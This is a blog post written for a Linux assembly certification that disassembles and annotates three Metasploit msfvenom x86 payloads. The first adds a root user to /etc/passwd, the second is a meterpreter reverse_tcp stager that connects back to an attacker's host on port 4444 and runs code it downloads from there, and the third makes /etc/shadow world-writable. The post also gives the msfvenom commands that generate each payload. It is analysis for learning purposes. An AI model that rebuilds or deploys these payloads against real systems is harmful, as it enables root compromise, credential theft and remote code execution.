SLAE Assignment #5 – Analyzing MsfVenom Payloads

So… here we go with assignment 5 (of 7). In this assignment I’ll dissect three different MsfVenom (-> Metasploit Framework) payloads and explain, what they do..


This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

Student ID: SLAE-890

This time no sources available but I included the generated .bin files and the shellcode.c skeleton on my github page  in case you wanna have some fun by yourself .-)

Let’s go!

First target: linux/x86_adduser (adds a user to /etc/passwd).

First: Generate the shellcode binary with msfvenom.

# msfvenom -p linux/x86/adduser -f raw | ndisasm -b 32 -

Next we send the binary through ndisasm. Please note that I had to run this twice since ndisasm wasn’t picking up correct offsets for the write() function at offset 0x53 so I re-ran ndisasm and skipped all bytes before 0x53 to get proper code. Here the full disassembly:

; ndisasm -b 32 linux_x86_adduser.bin

; int setregid(gid_t rgid, gid_t egid)
; int setregid(0, 0)

xor ecx,ecx
mov ebx,ecx
push byte +0x46
pop eax
int 0x80                         ; syscall 70: setreuid

; int open(const char *pathname, int flags);

push byte +0x5
pop eax
xor ecx,ecx                      ; flags = 0
push ecx                         ; zero terminate string
push dword 0x64777373            ; dwss
push dword 0x61702f2f            ; ap//
push dword 0x6374652f            ; cte/
mov ebx,esp                      ; pathname = /etc//passwd
inc ecx                          ; flags = 1      = O_WRONLY
mov ch,0x4                       ; flags = 0x0401 = O_WRONLY | O_NOCTTY
int 0x80

xchg eax,ebx                     ; fd -> ebx
call dword 0x53

string: db "metasploit:Az/dIsj4p4IRc:0:0::/:/bin/sh\n", 0x0a

; ndisasm -b 32 -k 0,82 linux_x86_adduser.bin to get correct start offset for this func
; ssize_t write(int fd, const void *buf, size_t count);

pop ecx                         ; pop  (string to write)
mov edx,[ecx-0x4]               ; size of buffer (0x28)
push byte +0x4
pop eax
int 0x80                        ; sysall: write

; void _exit(int status);
push byte +0x1
pop eax
int 0x80                        ; syscall: exit

Ok, that’s pretty straightforward. It does the following:

  • Sets UID and GID to 0 (root)
  • Open /etc//passwd for WRITE (and apparently also APPEND although the append bit -0x2000- is not set)
  • Writes the buffer (a passwd-compatible string, user: metasploit, pass: metasploit), appending to the open file
  • It doesn’t bother to close the file, it just calls the exit syscall to finish its work

Very basic and very to the point. And works just fine.

Next stop: linux/x86/meterpreter/reverse_tcp. Again, we trigger the disassembly.

# msfvenom -p linux/x86/meterpreter/reverse_tcp | ndisasm -b 32 

Here the analyzed and cleaned up assembly code for that first part of the multi-stage meterpreter code (bytecode removed for better visibility).

; int socketcall(int call, unsigned long *args);
; sets up socket with AF_INET, SOCK_STREAM, IPPROTO_IP)

xor ebx,ebx
mul ebx                     ; clean registers
push ebx                    ; IPPROTO_IP
inc ebx                     ; call = 1 (sys_socket)
push ebx                    ; SOCK_STREAM
push byte +0x2              ; AF_INET
mov al,0x66
mov ecx,esp
int 0x80

; int socketcall(int call, unsigned long *args); ->
; int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
; connect back to attacker's box (meterpreter handler)

xchg eax,edi
pop ebx
push dword 0x230aa8c0      ; ip:
push dword 0x5c110002      ; port: 4444
mov ecx,esp
push byte +0x66
pop eax
push eax
push ecx
push edi
mov ecx,esp
inc ebx                     ; fd = 3
int 0x80                    ; sys_connect

; int mprotect(void *addr, size_t len, int prot);
; set memory protection flags for 2b downloaded code

mov dl,0x7                  ; PROT_READ|PROT_WRITE|PROT_EXEC
mov ecx,0x1000              ; 0x1000 bytes
mov ebx,esp                 ; memory address (buffer to read to)
shr ebx,byte 0xc
shl ebx,byte 0xc            ; align to 0x1000-offset address
mov al,0x7d
int 0x80                    ; sys_mprotect

; ssize_t read(int fd, void *buf, size_t count);
; download some code from meterpreter handler and execute

pop ebx                     ; ebx: fd = 3
mov ecx,esp                 ; ecx: buffer to read to
mov dh,0xc                  ; edx: 0xc00 bytes
mov al,0x3                  ; eax: 3
int 0x80                    ; sys_read

; done! jump code

jmp ecx                     ; jump to received code (stage)

This is also very straightforward. The code does the following.

  • Create a socket
  • Connect back to the attacker’s machine (with running multi/handler) at  port 4444
  • Now something special: It sets memory protection bit for 0x1000 bytes of memory to READ, WRITE and EXEC
  • Final step: Read 0xC00 bytes from the attacker’s box (which should have started sending some stage code to this stager) and execute the received code in memory

Third analysis: linux/x86/chmod. Analyze the shellcode by doing this command:

# msfvenom -p linux/x86/chmod | ndisasm -b 32

Following the cleaned up and documented code:

push byte +0xf
pop eax
push edx
call _do_chmod

_pathname: db '/etc/shadow', 0

; int chmod(const char *pathname, mode_t mode);

pop ebx                             ; pop pathname from stack
push dword 0x1b6
pop ecx                             ; mode: 0666 (octal)
int 0x80                            ; syscall: chmod

push byte +0x1
pop eax
int 0x80                            ; syscall: exit

This is also very easy. The following things are done:

  • Call the syscall “chmod” for pathname “/etc/shadow” with mode 0666 octal (or 0x1b6 in hex)
  • Exit gracefully

That’s it for this assignment! See you in the next one.



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s